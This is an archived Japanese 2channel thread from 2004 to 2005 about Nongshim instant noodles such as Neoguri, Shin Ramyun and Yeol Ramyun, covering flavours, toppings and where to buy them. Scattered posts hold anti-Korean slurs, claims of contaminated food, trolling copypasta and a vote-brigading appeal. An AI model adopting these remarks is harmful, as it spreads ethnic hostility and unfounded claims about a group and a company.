2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【コムタン】韓国農心製品スレッド【キムチチゲ】

1 :名無しさん@お腹いっぱい。:04/10/08 04:03:42 ID:ip6zQl3N
ノグリラーメンとか、コムタンラーメンとか

辛ラーメンはこちら。
辛い!旨い!辛ラーメン
http://food6.2ch.net/test/read.cgi/nissin/1080465707/l50

2 :名無しさん@お腹いっぱい。:04/10/08 04:13:18 ID:ip6zQl3N
http://www.seoulnavi.com/food/food_r_article.php?id=126&ArtNo=17
http://oxygen8.hp.infoseek.co.jp/mono/food/ramyon/ramyoun.htm
このあたりに、麺いろいろ

3 :名無しさん@お腹いっぱい。:04/10/08 04:17:12 ID:ip6zQl3N
サリコムタンミョンをたべましたです。
辛くなくって、豚骨よりあっさりしてて、おいしい。
麺も生でかじっても、ぱりっとしてて( ゚Д゚)ウマー


4 :名無しさん@お腹いっぱい。:04/10/08 14:43:14 ID:jdkBavlR
もう2chで三回くらい書いたけど、
カップのキムチ焼きそばうまいぞ
みんなで食って扱う店を増やすのだ

5 :名無しさん@お腹いっぱい。:04/10/08 15:38:15 ID:+bEMsU5q
>>4
キムチ焼きそば、漏れには合わなかった。
辛ラーメンを焼きそば風にしたほうが旨い。

辛ラーメン以外では、農心のプテチゲラーメンが旨いけど・・・
・・・辛ラーメン以外は高くてあんまし食わない。

6 :名無しさん@お腹いっぱい。:04/10/09 00:20:14 ID:Mc6ggqtm
プテチゲ=部隊鍋

朝鮮戦争当時、アメリカ軍の持ち込んだソーセージを使った鍋が
韓国軍内ではやり、軍隊の部隊の鍋としてそのご一般に広まった。

7 :名無しさん@お腹いっぱい。:04/10/09 02:55:09 ID:9yNJ2jxL
おまえらサランヘヨ

8 :名無しさん@お腹いっぱい。:04/10/09 05:05:13 ID:hwOES9pq
チョヌン ハクグックラミョン チョアヨ

9 :名無しさん@お腹いっぱい。:04/10/09 05:29:27 ID:Mc6ggqtm
>>7
チョンマネヨー(どーいたしまして)
おいらもサランヘヨー(あいしてるぜぇ!)
あんたもイェッポヨー(可愛いなぁ)

>>8
(おいら、韓国ラーメン大好き)と申されてます(和漢ない香具師へ)
ナド チェゴジ!(おいらも最高っす)

おいらは日本人なんで、めちゃめちゃなカンコクゴしかわかりませんがw

10 :名無しさん@お腹いっぱい。:04/10/09 08:20:24 ID:WG0m+OjU
辛ラーメンスレから来ました。
このシリーズでいちばん辛いといわれてるのはどれなんでしょう?

11 :名無しさん@お腹いっぱい。:04/10/09 13:50:22 ID:yFXCPGoH
>>8
チョナンカンキタ━━━━━━(゚∀゚)━━━━━━ !!

>>10
ぶっちゃけとんがらし麺の方が辛いと思う。

12 :名無しさん@お腹いっぱい。:04/10/11 19:18:03 ID:9YN1DL5d
辛ラーメン、キムチラーメン、韓国のりラーメン以外は店頭で
みかけない。基本はツーハンか?

13 :すぐ名無し、すごく名無し:04/10/14 22:01:31 ID:DyiN66Dw
韓国人に聞いたら、ムパマラーメンが美味いって言ってたよ。

通販ならココが、種類も多くて安いと思う。
ttp://www.rakuten.co.jp/seoulfood/607080/
通販で買うと直輸入なので、ハングルのみで
日本語の作り方が無いんだよなぁ。


14 :すぐ名無し、すごく名無し:04/10/15 09:36:59 ID:cND3Wk2h
ノグリというのも評判がいい。
他に熱ラーメンも、辛以上にからく辛以上にコクがある日本人好みだと。

15 :すぐ名無し、すごく名無し:04/10/15 22:32:34 ID:XUV2Yhp+
>>10
四川チャジャン麺は、ラー油を全部使うと結構辛いよ。
でも、辛のほうが辛いし化学薬品臭いと思うw
私は辛いのが苦手なので、生生カルグックスとか生生ウドンが好きだな。

16 :すぐ名無し、すごく名無し:04/10/16 19:04:07 ID:FRiRIuex
ムパマラーメン食べてみた。
出汁が効いてて美味しかったよ。
辛さは黄色い袋に入った唐辛子粉で調節可。

17 :すぐ名無し、すごく名無し:04/10/16 20:05:56 ID:6nbAGz/q
韓国製品食う奴は全員チョソ
氏ね



とか言う奴が居なくて良いな

18 :すぐ名無し、すごく名無し:04/10/16 22:46:13 ID:bdnh1poR
辛ラーメンには何かが足りないと思います

19 :名無しさん@お腹いっぱい:04/10/17 02:10:17 ID:8T9P3+3B
辛ラーメンは辛いだけでぜんぜんおいしくない。
中に入ってる小袋にあらかじめ入ってるカヤクが
静電気で張り付いて取りにくい。
漏れが食った翌日に食った弟も同じこと言ってたよ。
これからは遠慮させていただきますわ、ハイ。

20 :すぐ名無し、すごく名無し:04/10/17 02:55:34 ID:dkJA8w0U
生生シリーズは、日清のごんぶとみたいな生麺で美味しいよな。
カルグクスの麺は平たくて、きしめんとか稲庭うどんに似てるね。
麺にまぶしてある油分が、スープに浮かぶのが気になるから、
スープを茹で汁に入れずに、ポットの湯で作ってるよ。

21 :すぐ名無し、すごく名無し:04/10/17 06:57:48 ID:kFrJxwdE
新ラーメン近所のジャスコでカップ麺なのに75円。日清のカップが99円だもん
しかたないわな。

22 :すぐ名無し、すごく名無し:04/10/17 07:57:41 ID:SKc8lQKd
>>19
ところがどっこい、袋麺に一手間かけてやると見違えるようにウマーになります。

23 :すぐ名無し、すごく名無し:04/10/17 08:55:36 ID:NSR/o338
ここの不幸は辛い物好きにファンが多いことだな
連中は味覚がおかしいから、こいつらに勧められた食ったヤシは
みんな農心マズーという印象がついてしまう。
辛ラーメンをプッシュしつづける勘違いからも脱却できない。

24 :すぐ名無し、すごく名無し:04/10/17 17:43:05 ID:KlWNbzA8
海物湯麺は辛くないけどうまいよ

25 :すぐ名無し、すごく名無し:04/10/17 20:15:19 ID:5sKbNUPk
>>24
安城湯麺も(゚Д゚)ウマーでつ。

26 :すぐ名無し、すごく名無し:04/10/17 23:59:34 ID:Hbhvw7Qa
辛くない/唐辛子ゼロ〜辛ラーメンまで

1)唐辛子ゼロ<<<<<<<<<ほとんど辛くない<<<<<<<辛くない<<<<<<<辛ラーメン

2)辛くない <<<<少し辛い<<<<<結構辛い<<<<辛よりも辛くない<<<<<辛ラーメン

辛さの基準も、人によって違うから。

27 ::04/10/18 06:57:00 ID:HS/3cCLr
スマン。意味わからん

28 :すぐ名無し、すごく名無し:04/10/18 23:59:00 ID:4PqQEuJk
>>19
辛ラースレ住民だけど、卵いれてみるといいよ。
CMもアレンジ前提のようだし、ほとんどのつけあわせ素材はプラスに
はたらくからためしてみなせい。

29 :すぐ名無し、すごく名無し:04/10/19 01:54:47 ID:bxzzOqIq
辛ラーメンスレでも見たけど、辛ラーメンのCMなんて観た事無いなぁ…。
初めて知ったんだけど、いつ頃から流れてるの?
つーか漏れの地方(静岡)で流れてるのかも怪しい。

30 :すぐ名無し、すごく名無し:04/10/19 09:43:08 ID:8MADzUs/
>>29
おまえんとこは辛ラーメンのCMが自動的に
金ちゃんのぶっかけうどんに切り替わるようになってる。

31 :すぐ名無し、すごく名無し:04/10/19 14:18:39 ID:m4kIqw8L
>>29
東京地区は、テレビ東京で、土曜の夜7時からの番組でCMやってる。
30秒くらいかな。
「君はこの味を知っているか。辛い、旨い、辛ラーメン!!」
あさり辛ラーメン、キムチ辛ラーメン、辛ラーメン焼きそばの3バージョンあり。
「一手間加えて・・幸せ」
最近はカップもプッシュしている。

32 :すぐ名無し、すごく名無し:04/10/19 15:31:43 ID:HJX3gp4R
『踊る大捜査線』に出ていたキムチラーメンも農心の物らしい。

33 :すぐ名無し、すごく名無し:04/10/20 02:21:24 ID:lBzNUGoV
>>30
うかつにもワロてしまったw
>>31
ありがd

34 :すぐ名無し、すごく名無し:04/10/21 14:41:51 ID:sGr1gGKi
辛ラーメンは一番美味だ
日本で辛ラーメンがシェア一位ではないことは
人種差別を感じる
インスタント麺は大韓で生まれ
日本軍がその技術を略奪したものであるが
日本はそのことを隠蔽し謝罪しない
韓日友好を考えると日本は相応の
賠償金を払うべきだ

35 :すぐ名無し、すごく名無し:04/10/21 18:01:49 ID:koeiW/Iz
韓国のりラーメンで初めて辛くないノンシンを体験しますた。
ラーメンよりうどん系に近いスープ、なかなかうまかった。

36 :すぐ名無し、すごく名無し :04/10/22 14:11:03 ID:M20Xq6Ih
気付いてると思うけど、韓国系は塩分薄目だよね。
塩からいのに弱い私でも ノグリうどんならスープ全部飲めるもん。
日本のインスタントメンは塩からすぎてダメだ。
農心製品、昔は安かったのに、今は高騰して悲しいね。
ノグリってたぬきだって知ってた?

37 :すぐ名無し、すごく名無し:04/10/22 16:15:59 ID:8SRu4an2
辛ラーメンうますぎ

38 :すぐ名無し、すごく名無し:04/10/22 17:05:11 ID:+4xpswFi
韓国製食品は栄養的に優れているばかりではなく
非常に美味である
即席麺に於いても日本製品をはるかに凌駕している
昔は海外に於いて即席麺は日本製品が多かったが
現在は栄養価と味に優れた大韓製品が主流だ
日本は大韓との競争に敗れ衰退しつつあるが
大韓は日本を越えた現在もなお成長つずけるのだ
これは民族的潜在能力の違いとしか考えられない

39 :すぐ名無し、すごく名無し:04/10/22 17:10:47 ID:aXC1iCBM
>>38
つづけるが正解。
日本語が難しかったら、朝鮮語でOKだよ。

40 :すぐ名無し、すごく名無し:04/10/22 17:19:50 ID:R0laHaHL
どこのコピペ?

41 :すぐ名無し、すごく名無し:04/10/22 17:38:50 ID:KMk7Iga7
>>39
34と同じ人でしょ。たぶん内容も誤字もわざとだヨ。

42 :すぐ名無し、すごく名無し:04/10/22 18:56:13 ID:MVEYVkW5
最近はネット右翼が嫌韓工作をしていると聞く
韓日友好を損ねようとしているようだ
だがこれを許してしまったら
また日本軍が暴走し侵略戦争し
世界の平和を破壊することになる
我々は決してネット右翼の韓日離間工作を
許してはならないのだ!!!!!!

43 :すぐ名無し、すごく名無し:04/10/22 20:42:27 ID:uSv8nNHz
モットウマイモンクワセヨ!

ユウショクハモウスミダ

44 :すぐ名無し、すごく名無し:04/10/23 01:14:18 ID:SHZmhsqG
サランヘヨ

45 :すぐ名無し、すごく名無し:04/10/23 15:27:58 ID:BXZx03da
シンジュクナカノアラカワスミダ!

46 :すぐ名無し、すごく名無し:04/10/23 15:28:28 ID:alMSS/vu
おまいら、辛ラーメンに入れてる具を晒してください。
素で食ったけどやっぱ物足らんので・・・

47 :すぐ名無し、すごく名無し:04/10/23 15:52:15 ID:5oFDyxG3
>>46
魚肉ソーセージ、きくらげ、もやし、ゆで卵、ねぎ

48 :すぐ名無し、すごく名無し:04/10/23 15:53:27 ID:OHMkGabD
韓国食材を入れるともっとおいしいです
本場キムチやマンドゥやトックがあうます

49 :すぐ名無し、すごく名無し:04/10/23 16:45:40 ID:2MIm7wFj
シンラミョン チンチャ マドpタ


50 :すぐ名無し、すごく名無し:04/10/23 20:58:19 ID:alMSS/vu
>47
レスありがとう!
適当(!?)でもいいみたいだな・・・

>48
韓国食材に疎いもので・・・早速ググってみた。
マンドゥ≒ギョウザ 漢字で書くとまんま"饅頭"。呼び名が日本と異なるね。
トック≒餅 日本のものよりベタつかないみたいですな。

>49
シックロォ!シンラミョン チンチャ マシイッタ !
・・・なんちゃってw

51 :すぐ名無し、すごく名無し:04/10/23 21:44:37 ID:ym/HCPLY
>>48
たとえば日本人限定トッピングの痰入りキムチや
生ごみリサイクルの海外輸出向け餃子とか。


52 :すぐ名無し、すごく名無し:04/10/23 21:45:24 ID:aW+ahQKd
>>46
おい、辛ラーメンスレに行くとそういう情報満載ですよ

53 :すぐ名無し、すごく名無し:04/10/27 18:31:34 ID:waP9Nk29
2年前旅行先での朝鮮総聯で
例によって右翼団体が来て私はやーな気分。 
その集団に向かって
一人の女子高生とおぼしき少女が向かっていく。

少女  「あんたら地元の人間か?」
右翼団体「私達は全国から集まった右翼団体で・・・云々」
少女  「で、何しにきたんや?」
右翼団体「天皇陛下に逆らう朝鮮人に天誅を下す・・・云々」
少女  「私は神戸の人間や。はるばる電車のって何しにここまで来たかわかるか?」
右翼団体「・・・・?」
少女  「地震で埋もれた家族を助けてくれたのは朝鮮総聯の人や。
寒い中ご飯作ってくれて、
風呂も沸かしてくれて
夜は夜でチャカ持ってパトロールしてくれたのもここの部隊の人や。   
私は、その人たちにお礼を言いに来たんや。
あんたらにわかるか?
消防車が来ても通り過ぎるだけの絶望感が。
でもここの人らは歩いて来てくれはったんや・・・・」

最初、怒鳴り散らすように
話し始めた少女は次第に涙声に変わっていった。
あまりにも印象的だったのではっきり覚えている。

右翼団体は撤退。
彼女は門をくぐった時に守衛さんが彼女に社交辞令の軽い敬礼ではなく直立不動のまま敬礼していた。

54 :すぐ名無し、すごく名無し:04/10/27 19:07:35 ID:3Z7pN0bw
>>53
リアルかマッチポンプか区別つかないケド極東板へドゾー

55 :すぐ名無し、すごく名無し:04/10/27 19:59:10 ID:QV3PIk9R
いつもは辛ラーメンなんだけど
安かったから三養ラーメンにしてみた
ちょっと物足りない


56 :すぐ名無し、すごく名無し:04/10/27 23:16:40 ID:Gs3+WNqC
新潟大地震の被災者にちょうどよい製品です、10万個程度無料支援
してはどうでしょうか。

57 :すぐ名無し、すごく名無し:04/10/28 18:53:25 ID:Yd9YfLoY
>>56
あったまれるからいいかもね。

58 :すぐ名無し、すごく名無し:04/10/28 19:47:55 ID:jRs9EUJH
>53
原文は↓だね。

2年前旅行先での駐屯地祭で例によって変な団体が来て私はやーな気分。
 その集団に向かって一人の女子高生とおぼしき少女が向かっていく。

少女「あんたら地元の人間か?」
団体「私達は全国から集まった市民団体で・・・云々」
少女「で、何しにきたんや?」
団体「憲法違反である自衛隊賛美につながる・・・云々」
少女「私は神戸の人間や。はるばる電車のって何しにここまで来たかわかるか?」
団体「・・・・?」
少女「地震で埋もれた家族を助けてくれたのはここの部隊の人や。
 寒い中ご飯作ってくれて、風呂も沸かしてくれて
 夜は夜で槍持ってパトロールしてくれたのもここの部隊の人や。
 私は、その人たちにお礼を言いに来たんや。
 あんたらにわかるか?
 消防車が来ても通り過ぎるだけの絶望感が。
 でもここの人らは歩いて来てくれはったんや・・・・」

最初、怒鳴り散らすように話し始めた少女は次第に涙声に変わっていった。
あまりにも印象的だったのではっきり覚えている。
団体は撤退。
彼女は門をくぐった時に守衛さんが彼女に社交辞令の軽い敬礼ではなく直立不動のまま敬礼していた。


59 :すぐ名無し、すごく名無し:04/10/29 11:28:49 ID:QLrqP9CA
半島帰れ

ごめん
いくとこないんだね

60 :すぐ名無し、すごく名無し:04/10/29 11:52:25 ID:V/Kc+Zwh
半島いじめが好きなやつはハン板にでもこもってろよ。
黄色いサル呼ばわりされても平気なんだろうな、差別容認するやつって。

61 :すぐ名無し、すごく名無し:04/10/29 13:28:37 ID:f0/yfXkv
うまいもんを楽しく語るスレなんだから
叩きや思想入ったレスはご遠慮願いたいものだよな。

62 :すぐ名無し、すごく名無し:04/10/29 23:55:34 ID:fWV6gx17
そんなことよりおまいら、話を戻して農心製品ってどうよ?

63 :すぐ名無し、すごく名無し:04/10/30 02:20:45 ID:YEcsmIaQ
>>62
ものによって麺の種類が違うが、太い固めの麺の食感が魅力的。
麺とスープの絡むバランスが良い。
辛ラーメン、キムチラーメン、韓国のりラーメンしか経験していないが
卵入れた袋の辛ラーがいまのとこ農心のベスト。

64 :すぐ名無し、すごく名無し:04/10/30 12:42:36 ID:jrf+0+PU
>>1-63
辛ラーメンの美味しい作り方、あるいは異文化理解
ttp://www.diana.dti.ne.jp/~kiyonori/diary0006.htm

65 :すぐ名無し、すごく名無し:04/10/30 14:15:46 ID:4tSjK5t4
>>64
そうだったのか・・麺を割って入れるのが儒教の教えだったとは。
韓国でヘムルチョンゴル食った後、ラーメン入れて食ったけど、オムニが確かに麺を割って
入れてくれたのを思い出した。

66 :すぐ名無し、すごく名無し:04/10/30 21:00:36 ID:sxZ5sics
>64
鍋のまま食べる、ってのがイイね!
俺は昔から袋ラーメン作ったら鍋のまま食ってたんだけど、親に
「みっともないからちゃんとドンブリに移してから食べなさい」
と怒られてしぶしぶ移してた・・・

辛ラーメンなら”コレが韓流の食べ方なんだ!”と胸を張って言えるな。


67 :すぐ名無し、すごく名無し:04/10/31 03:45:38 ID:DeMD0p8Y
カップより断然袋麺だね。
ノグリは辛より少々さっぱり系。
辛にはとろけるチーズをのせてもおいしいよ〜〜
こういう寒い日は辛いあったかいものが食べたくなる。

68 :すぐ名無し、すごく名無し:04/10/31 11:33:58 ID:D8USFNBP
>>67
チーズトッピングって韓国では結構普通らしいね。
最初ゲッ!って思ってたけど、やってみたら思いのほかウマーでした。
最近ソーセージも入れたりしてブデチゲ風にして食ってます。

69 :すぐ名無し、すごく名無し:04/10/31 16:01:13 ID:bGf0KLI4
コーン入りうんこを入れると本場の味に近づきますよ。


70 :すぐ名無し、すごく名無し:04/10/31 22:55:01 ID:DeMD0p8Y
食べ物スレなんだからやめましょうね。

71 :すぐ名無し、すごく名無し:04/10/31 22:59:01 ID:/RTenF7u
おれは韓国製の餃子を入れて食べるのが好き。


72 :すぐ名無し、すごく名無し:04/10/31 23:26:10 ID:H+p4RlrX
>>71
水餃子風もいいけどワンタンや肉団子もけっこういいですな。

73 :すぐ名無し、すごく名無し:04/11/01 03:36:17 ID:JhTx7/yM
いくとこないんだね


74 :すぐ名無し、すごく名無し:04/11/01 06:09:39 ID:nKhcIDu8
>>68
辛ラーメンスレではもっとすごい「牛乳入れる派」がいらっしゃいますた。
賛否あったけど。

75 :すぐ名無し、すごく名無し:04/11/01 07:52:08 ID:Kr1+VaPp
>>74
牛乳ですか、そこまでの勇気はちょっと無いなぁ。
ギョウザはやってみたけど麺と一緒に煮込んだら
スープを吸ってのびてしまっていまいちでした。
肉団子のほうがいいかな。

76 :すぐ名無し、すごく名無し:04/11/01 13:43:07 ID:slrmdjwk
近所のラーメン屋に「マヨネーズラーメン」ってのがある。
うまいワケ無いだろうと、ネタで食ってみたら意外とマイルドでイケる。
(スープはとんこつベースだった)
辛ラーメンでもマヨネーズやってみようかと思います。

77 :すぐ名無し、すごく名無し:04/11/01 21:37:58 ID:wE5lBWGI
韓国留学中の者でつ。
寮のご飯おいしくないからほぼ毎日1食はカップラーメンのお世話になってまつ。
農心のカップ麺って日本ではどのくらいの種類がでてますか?


78 :すぐ名無し、すごく名無し:04/11/01 22:09:02 ID:4v5AwHOZ
>>77
逆にお前がいる所は何種類あるの?

79 :すぐ名無し、すごく名無し:04/11/01 22:55:09 ID:wE5lBWGI
>>78
かぞえたことないからわかんないですが・・・
たぶん、20種類はくだらないとおもいます。
韓国のカップ麺は3分の2を農心が占めてるとおもいますよ。
ああ、、、カップヌードル食べたひ・・・

80 :すぐ名無し、すごく名無し:04/11/02 00:48:26 ID:0AU54V3M
>>79
日本では辛ラー、キムチラー、ノグリ、三洋、韓国のりラーがスーパーで
手に入るところです。

しかし20種じゃ選り取りみどりじゃありませんか。
農心一番の、いや、韓麺一番のおすすめ製品はずばりどれ!?

81 :すぐ名無し、すごく名無し:04/11/02 13:03:12 ID:MxlaocVB
>>55
三養は麺が弱い気がする。
日本のスープの方が合うかも。
農心の頑丈な麺じゃないと濃く辛い韓国味のスープに負けてしまう。

82 :すぐ名無し、すごく名無し:04/11/04 08:02:10 ID:hJYe13Vc
>>81
三様はたべたことないけれどノンシンの麺はスープによくマッチしてるね。
あの食感が(・∀・)イイ!!

83 :すぐ名無し、すごく名無し:04/11/08 21:14:45 ID:3c1FfDja
辛ラーメンのスープは鍋にも最適だから
ノンシンは粉末を単体で発売するように!

84 :すぐ名無し、すごく名無し:04/11/09 03:50:10 ID:wmf3CX8O
>>83
俺もよくやるよ。
鶏肉、鱈、野菜各種の鍋を
やってから締めにラーメン入れるとウマー

85 :すぐ名無し、すごく名無し:04/11/09 21:46:20 ID:7ha26RJf
>>84
だが鍋にするとスープが不足しがちだから追加調味料として粉末単体キボヌ。
それにしても体があったまる。

86 :すぐ名無し、すごく名無し:04/11/10 01:42:35 ID:Y5H3K2EF
今の時期にはサイコー

87 :すぐ名無し、すごく名無し:04/11/12 02:59:27 ID:FFsBuLFJ
>>86
のはずなんだけど気温がなんだか高い。アチー!
温室効果ガスのせいですか?

88 :すぐ名無し、すごく名無し:04/11/12 19:25:37 ID:fKarJ8ik
>>83
逆に味の煮詰まった鍋のシメ用に麺だけ欲しいときもある。
うちと交換したいねw

89 :すぐ名無し、すごく名無し:04/11/13 06:44:27 ID:bDuScMzX
今年の世相を漢字一字で表現する「今年の漢字」の応募受付中です。
最も応募の多い漢字が今年の漢字となりますが、それを韓国の
「韓」にしようという運動を展開している人達がいるようです。
ソース: ヨン様のファンら「今年の漢字は韓」
http://japanese.joins.com/html/2004/1110/20041110192237700.html

もし「韓」に決まると発表日の 12月13日、京都・清水寺の和尚さんが公の前で
大きい紙に「韓」と書き、それがニュースとして流されるという悪夢が起きます。

「寒流捏風」にいい加減うんざりしている方も多いことと思います。そこで、
「韓」が今年の漢字になるのを阻止するため、皆で「災」に投票しましょう。
向こうは「韓」一つに絞って投票していますので、票の分散を避けて「災」に
統一しましょう。
────────────────────────────────
投票: http://210.173.75.150/2004kanji.html
締切: 12月6日 (月)  発表: 12月13日 (月)
────────────────────────────────
【韓】2004年を象徴した漢字は【韓】
http://society3.2ch.net/test/read.cgi/korea/1100133705/l50
【寒流】ヨン様のファンら「今年の漢字は韓」
http://tmp4.2ch.net/test/read.cgi/asia/1100137742/l50
ヨン様のファンら「今年の漢字は韓」
http://news16.2ch.net/test/read.cgi/dqnplus/1100233357/l50
【DQN主婦】ヨン様のファンら「今年の漢字は韓」【組織票阻止】
http://ex7.2ch.net/test/read.cgi/news4vip/1100259351/l50

90 :すぐ名無し、すごく名無し:04/11/13 10:21:44 ID:Dz+2IscF
今年の漢字は「辛」だな

91 :すぐ名無し、すごく名無し:04/11/13 15:14:30 ID:20cMfz4+
「辛」ですね

92 :すぐ名無し、すごく名無し:04/11/24 03:09:07 ID:Vn7xR93z
熱ラーメンの「熱」はどうです

93 :すぐ名無し、すごく名無し:04/11/24 11:39:05 ID:CbeK//An
>>92
ハングル文字だろ

94 :すぐ名無し、すごく名無し:04/11/26 00:53:54 ID:AuziRjN/
たしかちっさく漢字で熱と書いてあったはずだ

95 :すぐ名無し、すごく名無し:04/12/17 04:59:40 ID:z2L2to9Y
突然の告知すみません。
http://www.kimchi.or.kr/event_kimchi/pg_main.jsp
韓国の農協より、100名までは全員プレゼントでキムチが送られてくるそうです。100名以上は抽選。

昨年は150名の応募があったのですが、今年は少なくて困っていらっしゃるそうです。

みなさまどうぞご応募を!

募集期限 2004年12月18日


96 :すぐ名無し、すごく名無し:04/12/17 12:20:49 ID:vyqh7r2p
在日朝鮮人が群れ集うスレはここですか?

97 :すぐ名無し、すごく名無し:04/12/22 15:15:47 ID:YSNpNJFJ
辛ラーメンのほうがずっと進行してる。
やはりノンシンの製品では辛ラーメンがいちばん人気があるんだろうな。

98 :すぐ名無し、すごく名無し:04/12/29 05:53:53 ID:Op4lz2XX
他商品の話も辛スレで語れちゃってるね。

99 :すぐ名無し、すごく名無し:04/12/31 17:11:48 ID:J4OBil2Y
酒のやまやで5個入りのキムチラーメン買ったけど、あんまり辛くない。
辛ラーメンを薄くした感じ。

100 :すぐ名無し、すごく名無し:04/12/31 17:31:23 ID:kS+M/Jnl
私はノグリも好き。
それから三養のヨルムビビン麺が好み。
きゅうりやたまごを入れるとおいしい☆

101 :すぐ名無し、すごく名無し:05/01/01 16:06:09 ID:XuzK76cr
ノグリ評判いいな。
辛ラーメンより前からあるらしいけど。

102 :すぐ名無し、すごく名無し:05/01/12 03:52:10 ID:k8amL/ns
この会社と、霊感商法統一協会との関係は?

103 :すぐ名無し、すごく名無し:05/01/13 02:16:34 ID:URnJhJ2j
( ゚Д゚)ハァ?

104 :すぐ名無し、すごく名無し:05/01/13 12:48:42 ID:/5bM10fg
キムチ焼きそばが好き

105 :すぐ名無し、すごく名無し:05/01/13 13:13:19 ID:IH16EZFQ
一和ならしってるが。

106 :すぐ名無し、すごく名無し:05/01/13 14:37:56 ID:9vUQPc2T
韓国の食品工場って、衛生観念が薄いから
本当に食べて大丈夫だろうか

餃子の例もあるし

107 :すぐ名無し、すごく名無し:05/01/13 15:40:57 ID:/5bM10fg
日本でさえ異物混入とかあるぐらいだしね…そんなこと言っちゃあ外国製品なんか全滅でしょ。

108 :すぐ名無し、すごく名無し:05/01/13 15:52:07 ID:35WgSSIn
熱ラーメン日本版のカップを食べてみたけが辛さ抑えすぎ。
元のままでいいのに。

109 :すぐ名無し、すごく名無し:05/01/13 22:13:33 ID:/5bM10fg
日本版もあることだし、衛生面で気になる人でも大丈夫ですね。ただ辛さが押さえられてるのは私もいただけない。最近韓国麺が減ってきているから直輸入が欲しかったら鶴橋まで逝かんといけないのが面倒だな…

110 :すぐ名無し、すごく名無し:05/01/14 08:27:59 ID:QjUvSk6A
辛ラーメンは日本版も充分うまいが熱ラーメンはあきらかに辛く無くなってる。
本来なら辛ラーメンより辛くてコクがあるもんなのに。

111 :黒猫様:05/01/15 22:04:26 ID:X3V3uau+
ドンキホーテに逝って、本場韓国のチゲラーメンを買ってきました。
餅を入れて食べました。
おいしかったです。

112 :すぐ名無し、すごく名無し:05/01/16 00:47:25 ID:gzLy70hE
味の決め手は犬エキス

113 :すぐ名無し、すごく名無し:05/01/16 01:30:53 ID:XPcmYFYm
>>111
キムチチゲラーメンてのはちょっと酸味が入ってるのがいいな。
違う商品だったらスマソ。

114 :すぐ名無し、すごく名無し:05/01/16 04:15:44 ID:+mVEsojG
>113
ポグルポグルチゲラミョン(ぐつぐつチゲラーメン」のことだろう.
あれはプデチゲがコンセプト.J農心のは具も味も違うので苗...
具に貧相なトックとソーセージは入っていたか???




入っていたら韓版.なければ日版.

115 :すぐ名無し、すごく名無し:05/01/16 10:40:07 ID:RSBQFQ22
>>104
はげどう。しかし、
一般人には農心は辛ラーメンみたいな激辛野郎向けと思われて敬遠され、
カプサイシン馬鹿にはキムチ焼そばは辛くないからマズイと言われ
なんとも不遇だ。

116 :113:05/02/03 00:46:51 ID:KOjb3w3e
>>114
激しくおそい変身でスマソ。
どうやら違う商品のようで。
たとえ貧相でもトックが入ってるのは贅沢なつくりだね。
食ってみたい。

117 :すぐ名無し、すごく名無し:05/02/03 14:32:48 ID:P63caLDi
114はものすごいネイティブ。

118 :すぐ名無し、すごく名無し:05/03/02 09:49:53 ID:/HXXUqD5
農心つながりで<<農学>>に投票おねがいします><
2ch人気トーナメントです!

↓投票所はこちら(『投票スレッド』にて投票してください)
http://etc3.2ch.net/vote/

↓投票用のコード(投票に必要です)
http://tiger513.maido3.com/~bs6000/2ch/

↓投票形式は
[[投票コード]]
<<農学>>

↓今現在の投票スレ
http://etc3.2ch.net/test/read.cgi/vote/1109682698/


119 :すぐ名無し、すごく名無し:05/03/02 09:59:19 ID:LcgjwXhx
辛い物好きとしてはタイのトムヤムラーメンにはまり出した。
向うはシンプルに喰うだけのほうがよい

120 :すぐ名無し、すごく名無し:05/03/04 12:06:50 ID:f3OAWOLE
ノンシムキムチすげぇうまかったカップヌードルキムチの比じゃないね

121 :すぐ名無し、すごく名無し:05/03/04 16:19:05 ID:UJrVv1Dj
>>120
カポヌードルもいいけど、やっぱ本場には敵わないよな。

122 :すぐ名無し、すごく名無し:05/03/06 22:23:37 ID:fZ8uOWJT
今日辛ラーメン買ってきた(´∀`)
楽しみだ♪

123 :すぐ名無し、すごく名無し:05/03/06 22:25:33 ID:fZ8uOWJT
今日辛ラーメン買ってきた(´∀`)
明日食べるの楽しみ♪

124 :すぐ名無し、すごく名無し:05/03/07 12:56:16 ID:Cpm3vMMj
辛ラーメンマズ-(`Д´)

125 :すぐ名無し、すごく名無し:05/03/08 06:42:36 ID:6h4/7xK9
韓国のインスタントラーメンなんか食って大丈夫なの?
とても信用できません。

126 :すぐ名無し、すごく名無し:05/03/08 13:10:05 ID:51+LQFRp
農心商品はみんな辛ラーメンスレで語られちゃってるから
このスレ影うすいなー
>>120
あれはあくまでカップヌードルベースのキムチ味ということゆえ。
それはそれでうまかった

127 :すぐ名無し、すごく名無し:05/03/08 19:41:36 ID:EGkALbA0
ノグリラーメンは日本版と韓国版で味違いますか?

128 :すぐ名無し、すごく名無し:05/03/08 19:42:24 ID:EGkALbA0
ノグリラーメンは日本版と韓国版で味違いますか?

129 : ◆koreaIIBwU :05/03/08 19:52:01 ID:hKA0YTKC
日本版なんてあるのか?

130 :すぐ名無し、すごく名無し:05/03/08 21:03:00 ID:EGkALbA0
>>129
今日輸入食材のお店に行ったら売ってたんですよ。
裏に日本版辛ラーみたいに、日本語の作り方が書いてあるんです。
食えばわかるだろ!ってつっこまれそうですがw
もし分かる方いたら教えて下さい。
同じく日本版熱ラーメンとキムチラーメンも買ったので、
食べたらレポしますね ノシ

131 :あぼーん:あぼーん
あぼーん

132 :すぐ名無し、すごく名無し:05/03/09 07:31:34 ID:N5WhA/Vr
行程にまぎれこんだハエやらチャバネゴキブリなんかも
かやくに入っていそうで怖いなあ。韓国って結構大雑把な
国って言うし。

133 :すぐ名無し、すごく名無し:05/03/09 08:14:10 ID:zNuJP8xz
>>125
食い始めてもうかれこれ1年近くになるが
体に異常は全く無い。安心して食え。

134 :すぐ名無し、すごく名無し:05/03/09 10:46:47 ID:+k0tICsu
農心ではノグリがやはり最ウマかと。
とき卵入れたら超ウマー(´∀`)/シ

135 :すぐ名無し、すごく名無し:05/03/09 11:08:01 ID:KKycAkAv
農心在日社員臭がきついスレだな。

136 : ◆koreaIIBwU :05/03/12 08:39:45 ID:XG+TYY1H
http://img2.store.yahoo.co.jp/I/kochujang_1831_6344314

このキムチカップを食べた。
スープは日本のもの(あの縦型の)よりおいしかったけれど、キムチが少ないのと麺がぼそぼそしているのが不満。

137 :すぐ名無し、すごく名無し:05/03/12 08:50:38 ID:U98VAPaS
↑開けないのは私だけ?

138 : ◆koreaIIBwU :05/03/12 08:53:16 ID:XG+TYY1H
んじゃこれで。
